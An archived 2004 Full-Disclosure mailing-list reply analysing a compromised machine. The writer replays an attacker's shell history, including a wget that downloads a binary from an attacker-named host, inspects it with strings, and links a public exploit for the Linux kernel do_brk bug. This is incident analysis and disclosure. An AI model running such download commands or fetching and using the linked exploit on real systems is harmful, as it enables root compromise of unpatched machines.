Re: [Full-Disclosure] Automated ssh scanning

From: Gary E. Miller (gem_at_rellim.com)
Date: 08/26/04

  • Next message: Joshua J. Berry: "[ GLSA 200408-25 ] MoinMoin: Group ACL bypass" 
    To: Deigo Dude <deigodude@aol.com>
Date: Thu, 26 Aug 2004 13:17:53 -0700 (PDT)

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Yo All!

    On Thu, 26 Aug 2004, Deigo Dude wrote:

    > Maybe running this test again, and this time ...

    No need to run the test again.

    - From the .history I duplicated this:

     wget www.bo2k-rulez.net/a

    Then did this to see the strings in the binary:

     strings a | less

    This string looked ineresting:

     Kernel seems not to be vulnerable

    A google on that string yields the exloit:

     http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php

    A simple exploit for the well known do_brk bug in the Linux kernel...

    RGDS
    GARY
    - ---------------------------------------------------------------------------
    Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
            gem@rellim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.3 (GNU/Linux)

    iD8DBQFBLkV08KZibdeR3qURArHuAKCoB+1Tgz/HmW8oxsrhQXCyvSsFdQCeOCo1
    HxOTENngG5Uan2kR0uC7El4=
    =Ddpd
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Joshua J. Berry: "[ GLSA 200408-25 ] MoinMoin: Group ACL bypass"

    Relevant Pages

    • Re: [NFS] rpc.mountd crashes when extensively using netgroups
      ... the kernel export cache would increase. ... hosts are in which netgroups? ... We need to map IPADDRESS to THING, and THING + PATH to EXPORTPOINT. ... Another option is to use whatever strings are included in /etc/exports ...
      (Linux-Kernel)
    • RFC: Using fixed-length strings for version[] and osrelease[]
      ... the strings versionand ... addresses throughout the kernel binary. ... Such cascading differences in addresses cause FreeBSD Update ... this could be done simply by declaring these two strings as having fixed ...
      (freebsd-arch)
    • Re: "Re: [PATCH 0/2] Colored kernel output (run2)" + "`Subject: usage"
      ... If kernel printing were going to be done over, I would suggest that instead of the current fixed format strings, the format argument would be an index, an ordinal into an array of *char pointers, and the string so described would be used as the format. ... These strings and pointers could be put in two modules, one part of init to be released after boot like other init code, one resident. ...
      (Linux-Kernel)
    • sysctl text definitions.
      ... export those handy description strings from the kernel SYSCTL macros ... const char *parent; ... Then after building the kernel one should be able to do: ... Sysctl or some other util could then read these db files to give ...
      (freebsd-hackers)
    • Re: Unbloating the kernel, was: :mem=16MB laptop testing
      ... Are kernel versions 2.2 or even 2.0 really not sufficient for such ... | games/X/mozilla/kde/gnome on old hardware perhaps you shouldn't run the ... | strings as error codes and return ERROR#42345 or something instead of the ... set of definitions optimized for various configurations. ...
      (Linux-Kernel)